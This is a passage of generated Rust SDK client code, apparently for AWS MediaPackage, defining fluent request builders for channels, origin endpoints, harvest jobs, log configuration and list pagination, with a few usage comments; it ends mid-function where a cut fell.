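    //!     // Pick an operation method on the client, set parameters, then `send`.
    //!     let channel = client.describe_channel().id("my-channel").send().await?;
    //!     println!("channel ARN: {:?}", channel.arn());
    //!     Ok(())
    //! }
    //! ```
    //!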
/// Fluent builder constructing a request to `ConfigureLogs`.
///
    /// Changes the Channel's properties to configure log subscription.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct ConfigureLogs {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::configure_logs_input::Builder,
}
impl ConfigureLogs {
/// Creates a new `ConfigureLogs`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::ConfigureLogsOutput,
aws_smithy_http::result::SdkError<crate::error::ConfigureLogsError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// Configure egress access logging.
pub fn egress_access_logs(mut self, input: crate::model::EgressAccessLogs) -> Self {
self.inner = self.inner.egress_access_logs(input);
self
}
/// Configure egress access logging.
pub fn set_egress_access_logs(
mut self,
input: std::option::Option<crate::model::EgressAccessLogs>,
) -> Self {
self.inner = self.inner.set_egress_access_logs(input);
self
}
        /// The ID of the channel whose log subscription is being configured.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
        /// The ID of the channel whose log subscription is being configured.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
/// Configure ingress access logging.
pub fn ingress_access_logs(mut self, input: crate::model::IngressAccessLogs) -> Self {
self.inner = self.inner.ingress_access_logs(input);
self
}
/// Configure ingress access logging.
pub fn set_ingress_access_logs(
mut self,
input: std::option::Option<crate::model::IngressAccessLogs>,
) -> Self {
self.inner = self.inner.set_ingress_access_logs(input);
self
}
}
/// Fluent builder constructing a request to `CreateChannel`.
///
/// Creates a new Channel.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct CreateChannel {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::create_channel_input::Builder,
}
impl CreateChannel {
/// Creates a new `CreateChannel`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::CreateChannelOutput,
aws_smithy_http::result::SdkError<crate::error::CreateChannelError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// A short text description of the Channel.
pub fn description(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.description(input.into());
self
}
/// A short text description of the Channel.
pub fn set_description(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_description(input);
self
}
/// The ID of the Channel. The ID must be unique within the region and it cannot be changed after a Channel is created.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the Channel. The ID must be unique within the region and it cannot be changed after a Channel is created.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
/// Adds a key-value pair to `Tags`.
///
/// To override the contents of this collection use [`set_tags`](Self::set_tags).
///
/// A collection of tags associated with a resource
pub fn tags(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
self.inner = self.inner.tags(k.into(), v.into());
self
}
/// A collection of tags associated with a resource
pub fn set_tags(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.inner = self.inner.set_tags(input);
self
}
}
/// Fluent builder constructing a request to `CreateHarvestJob`.
///
/// Creates a new HarvestJob record.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct CreateHarvestJob {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::create_harvest_job_input::Builder,
}
impl CreateHarvestJob {
/// Creates a new `CreateHarvestJob`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::CreateHarvestJobOutput,
aws_smithy_http::result::SdkError<crate::error::CreateHarvestJobError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The end of the time-window which will be harvested
pub fn end_time(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.end_time(input.into());
self
}
/// The end of the time-window which will be harvested
pub fn set_end_time(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_end_time(input);
self
}
/// The ID of the HarvestJob. The ID must be unique within the region and it cannot be changed after the HarvestJob is submitted
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the HarvestJob. The ID must be unique within the region and it cannot be changed after the HarvestJob is submitted
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
/// The ID of the OriginEndpoint that the HarvestJob will harvest from. This cannot be changed after the HarvestJob is submitted.
pub fn origin_endpoint_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.origin_endpoint_id(input.into());
self
}
/// The ID of the OriginEndpoint that the HarvestJob will harvest from. This cannot be changed after the HarvestJob is submitted.
pub fn set_origin_endpoint_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_origin_endpoint_id(input);
self
}
/// Configuration parameters for where in an S3 bucket to place the harvested content
pub fn s3_destination(mut self, input: crate::model::S3Destination) -> Self {
self.inner = self.inner.s3_destination(input);
self
}
/// Configuration parameters for where in an S3 bucket to place the harvested content
pub fn set_s3_destination(
mut self,
input: std::option::Option<crate::model::S3Destination>,
) -> Self {
self.inner = self.inner.set_s3_destination(input);
self
}
/// The start of the time-window which will be harvested
pub fn start_time(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.start_time(input.into());
self
}
/// The start of the time-window which will be harvested
pub fn set_start_time(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_start_time(input);
self
}
}
/// Fluent builder constructing a request to `CreateOriginEndpoint`.
///
/// Creates a new OriginEndpoint record.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct CreateOriginEndpoint {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::create_origin_endpoint_input::Builder,
}
impl CreateOriginEndpoint {
/// Creates a new `CreateOriginEndpoint`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::CreateOriginEndpointOutput,
aws_smithy_http::result::SdkError<crate::error::CreateOriginEndpointError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// CDN Authorization credentials
pub fn authorization(mut self, input: crate::model::Authorization) -> Self {
self.inner = self.inner.authorization(input);
self
}
/// CDN Authorization credentials
pub fn set_authorization(
mut self,
input: std::option::Option<crate::model::Authorization>,
) -> Self {
self.inner = self.inner.set_authorization(input);
self
}
/// The ID of the Channel that the OriginEndpoint will be associated with. This cannot be changed after the OriginEndpoint is created.
pub fn channel_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.channel_id(input.into());
self
}
/// The ID of the Channel that the OriginEndpoint will be associated with. This cannot be changed after the OriginEndpoint is created.
pub fn set_channel_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_channel_id(input);
self
}
/// A Common Media Application Format (CMAF) packaging configuration.
pub fn cmaf_package(
mut self,
input: crate::model::CmafPackageCreateOrUpdateParameters,
) -> Self {
self.inner = self.inner.cmaf_package(input);
self
}
/// A Common Media Application Format (CMAF) packaging configuration.
pub fn set_cmaf_package(
mut self,
input: std::option::Option<crate::model::CmafPackageCreateOrUpdateParameters>,
) -> Self {
self.inner = self.inner.set_cmaf_package(input);
self
}
/// A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
pub fn dash_package(mut self, input: crate::model::DashPackage) -> Self {
self.inner = self.inner.dash_package(input);
self
}
/// A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
pub fn set_dash_package(
mut self,
input: std::option::Option<crate::model::DashPackage>,
) -> Self {
self.inner = self.inner.set_dash_package(input);
self
}
/// A short text description of the OriginEndpoint.
pub fn description(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.description(input.into());
self
}
/// A short text description of the OriginEndpoint.
pub fn set_description(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_description(input);
self
}
/// An HTTP Live Streaming (HLS) packaging configuration.
pub fn hls_package(mut self, input: crate::model::HlsPackage) -> Self {
self.inner = self.inner.hls_package(input);
self
}
/// An HTTP Live Streaming (HLS) packaging configuration.
pub fn set_hls_package(
mut self,
input: std::option::Option<crate::model::HlsPackage>,
) -> Self {
self.inner = self.inner.set_hls_package(input);
self
}
/// The ID of the OriginEndpoint. The ID must be unique within the region and it cannot be changed after the OriginEndpoint is created.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the OriginEndpoint. The ID must be unique within the region and it cannot be changed after the OriginEndpoint is created.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
/// A short string that will be used as the filename of the OriginEndpoint URL (defaults to "index").
pub fn manifest_name(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.manifest_name(input.into());
self
}
/// A short string that will be used as the filename of the OriginEndpoint URL (defaults to "index").
pub fn set_manifest_name(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_manifest_name(input);
self
}
/// A Microsoft Smooth Streaming (MSS) packaging configuration.
pub fn mss_package(mut self, input: crate::model::MssPackage) -> Self {
self.inner = self.inner.mss_package(input);
self
}
/// A Microsoft Smooth Streaming (MSS) packaging configuration.
pub fn set_mss_package(
mut self,
input: std::option::Option<crate::model::MssPackage>,
) -> Self {
self.inner = self.inner.set_mss_package(input);
self
}
        /// Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may be requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination.
pub fn origination(mut self, input: crate::model::Origination) -> Self {
self.inner = self.inner.origination(input);
self
}
        /// Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may be requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination.
pub fn set_origination(
mut self,
input: std::option::Option<crate::model::Origination>,
) -> Self {
self.inner = self.inner.set_origination(input);
self
}
/// Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
pub fn startover_window_seconds(mut self, input: i32) -> Self {
self.inner = self.inner.startover_window_seconds(input);
self
}
/// Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
pub fn set_startover_window_seconds(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_startover_window_seconds(input);
self
}
/// Adds a key-value pair to `Tags`.
///
/// To override the contents of this collection use [`set_tags`](Self::set_tags).
///
/// A collection of tags associated with a resource
pub fn tags(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
self.inner = self.inner.tags(k.into(), v.into());
self
}
/// A collection of tags associated with a resource
pub fn set_tags(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.inner = self.inner.set_tags(input);
self
}
/// Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
pub fn time_delay_seconds(mut self, input: i32) -> Self {
self.inner = self.inner.time_delay_seconds(input);
self
}
/// Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
pub fn set_time_delay_seconds(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_time_delay_seconds(input);
self
}
/// Appends an item to `Whitelist`.
///
/// To override the contents of this collection use [`set_whitelist`](Self::set_whitelist).
///
/// A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
pub fn whitelist(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.whitelist(input.into());
self
}
/// A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
pub fn set_whitelist(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.inner = self.inner.set_whitelist(input);
self
}
}
/// Fluent builder constructing a request to `DeleteChannel`.
///
/// Deletes an existing Channel.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct DeleteChannel {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::delete_channel_input::Builder,
}
impl DeleteChannel {
/// Creates a new `DeleteChannel`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::DeleteChannelOutput,
aws_smithy_http::result::SdkError<crate::error::DeleteChannelError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The ID of the Channel to delete.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the Channel to delete.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
}
/// Fluent builder constructing a request to `DeleteOriginEndpoint`.
///
/// Deletes an existing OriginEndpoint.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct DeleteOriginEndpoint {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::delete_origin_endpoint_input::Builder,
}
impl DeleteOriginEndpoint {
/// Creates a new `DeleteOriginEndpoint`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::DeleteOriginEndpointOutput,
aws_smithy_http::result::SdkError<crate::error::DeleteOriginEndpointError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The ID of the OriginEndpoint to delete.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the OriginEndpoint to delete.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
}
/// Fluent builder constructing a request to `DescribeChannel`.
///
/// Gets details about a Channel.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct DescribeChannel {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::describe_channel_input::Builder,
}
impl DescribeChannel {
/// Creates a new `DescribeChannel`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::DescribeChannelOutput,
aws_smithy_http::result::SdkError<crate::error::DescribeChannelError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The ID of a Channel.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of a Channel.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
}
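    // A minimal sketch of the send()/SdkError flow described in the docs above
    // (illustrative only: the client construction and the channel id are
    // assumptions, and the output is simply Debug-printed rather than relying on
    // specific fields):
    //
    //     let client = crate::Client::new(&sdk_config);
    //     match client.describe_channel().id("my-channel").send().await {
    //         Ok(output) => println!("{:?}", output),
    //         Err(err) => eprintln!("DescribeChannel failed: {}", err),
    //     }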
/// Fluent builder constructing a request to `DescribeHarvestJob`.
///
/// Gets details about an existing HarvestJob.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct DescribeHarvestJob {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::describe_harvest_job_input::Builder,
}
impl DescribeHarvestJob {
/// Creates a new `DescribeHarvestJob`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::DescribeHarvestJobOutput,
aws_smithy_http::result::SdkError<crate::error::DescribeHarvestJobError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The ID of the HarvestJob.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the HarvestJob.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
}
/// Fluent builder constructing a request to `DescribeOriginEndpoint`.
///
/// Gets details about an existing OriginEndpoint.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct DescribeOriginEndpoint {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::describe_origin_endpoint_input::Builder,
}
impl DescribeOriginEndpoint {
/// Creates a new `DescribeOriginEndpoint`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::DescribeOriginEndpointOutput,
aws_smithy_http::result::SdkError<crate::error::DescribeOriginEndpointError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The ID of the OriginEndpoint.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the OriginEndpoint.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
}
/// Fluent builder constructing a request to `ListChannels`.
///
/// Returns a collection of Channels.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct ListChannels {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::list_channels_input::Builder,
}
impl ListChannels {
/// Creates a new `ListChannels`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::ListChannelsOutput,
aws_smithy_http::result::SdkError<crate::error::ListChannelsError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// Create a paginator for this request
///
/// Paginators are used by calling [`send().await`](crate::paginator::ListChannelsPaginator::send) which returns a [`Stream`](tokio_stream::Stream).
pub fn into_paginator(self) -> crate::paginator::ListChannelsPaginator {
crate::paginator::ListChannelsPaginator::new(self.handle, self.inner)
}
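        // A rough sketch of driving the paginator returned above (assumes
        // `tokio_stream::StreamExt` is in scope for `.next()`; each page is a
        // `ListChannelsOutput` wrapped in a Result):
        //
        //     use tokio_stream::StreamExt;
        //     let mut pages = client.list_channels().into_paginator().send();
        //     while let Some(page) = pages.next().await {
        //         println!("{:?}", page?);
        //     }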
/// Upper bound on number of records to return.
pub fn max_results(mut self, input: i32) -> Self {
self.inner = self.inner.max_results(input);
self
}
/// Upper bound on number of records to return.
pub fn set_max_results(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_max_results(input);
self
}
/// A token used to resume pagination from the end of a previous request.
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.next_token(input.into());
self
}
/// A token used to resume pagination from the end of a previous request.
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_next_token(input);
self
}
}
/// Fluent builder constructing a request to `ListHarvestJobs`.
///
/// Returns a collection of HarvestJob records.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct ListHarvestJobs {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::list_harvest_jobs_input::Builder,
}
impl ListHarvestJobs {
/// Creates a new `ListHarvestJobs`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::ListHarvestJobsOutput,
aws_smithy_http::result::SdkError<crate::error::ListHarvestJobsError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// Create a paginator for this request
///
/// Paginators are used by calling [`send().await`](crate::paginator::ListHarvestJobsPaginator::send) which returns a [`Stream`](tokio_stream::Stream).
pub fn into_paginator(self) -> crate::paginator::ListHarvestJobsPaginator {
crate::paginator::ListHarvestJobsPaginator::new(self.handle, self.inner)
}
/// When specified, the request will return only HarvestJobs associated with the given Channel ID.
pub fn include_channel_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.include_channel_id(input.into());
self
}
/// When specified, the request will return only HarvestJobs associated with the given Channel ID.
pub fn set_include_channel_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_include_channel_id(input);
self
}
/// When specified, the request will return only HarvestJobs in the given status.
pub fn include_status(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.include_status(input.into());
self
}
/// When specified, the request will return only HarvestJobs in the given status.
pub fn set_include_status(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_include_status(input);
self
}
/// The upper bound on the number of records to return.
pub fn max_results(mut self, input: i32) -> Self {
self.inner = self.inner.max_results(input);
self
}
/// The upper bound on the number of records to return.
pub fn set_max_results(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_max_results(input);
self
}
/// A token used to resume pagination from the end of a previous request.
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.next_token(input.into());
self
}
/// A token used to resume pagination from the end of a previous request.
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_next_token(input);
self
}
}
/// Fluent builder constructing a request to `ListOriginEndpoints`.
///
/// Returns a collection of OriginEndpoint records.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct ListOriginEndpoints {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::list_origin_endpoints_input::Builder,
}
impl ListOriginEndpoints {
/// Creates a new `ListOriginEndpoints`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::ListOriginEndpointsOutput,
aws_smithy_http::result::SdkError<crate::error::ListOriginEndpointsError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// Create a paginator for this request
///
/// Paginators are used by calling [`send().await`](crate::paginator::ListOriginEndpointsPaginator::send) which returns a [`Stream`](tokio_stream::Stream).
pub fn into_paginator(self) -> crate::paginator::ListOriginEndpointsPaginator {
crate::paginator::ListOriginEndpointsPaginator::new(self.handle, self.inner)
}
/// When specified, the request will return only OriginEndpoints associated with the given Channel ID.
pub fn channel_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.channel_id(input.into());
self
}
/// When specified, the request will return only OriginEndpoints associated with the given Channel ID.
pub fn set_channel_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_channel_id(input);
self
}
/// The upper bound on the number of records to return.
pub fn max_results(mut self, input: i32) -> Self {
self.inner = self.inner.max_results(input);
self
}
/// The upper bound on the number of records to return.
pub fn set_max_results(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_max_results(input);
self
}
/// A token used to resume pagination from the end of a previous request.
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.next_token(input.into());
self
}
/// A token used to resume pagination from the end of a previous request.
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_next_token(input);
self
}
}
/// Fluent builder constructing a request to `ListTagsForResource`.
///
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct ListTagsForResource {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::list_tags_for_resource_input::Builder,
}
impl ListTagsForResource {
/// Creates a new `ListTagsForResource`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::ListTagsForResourceOutput,
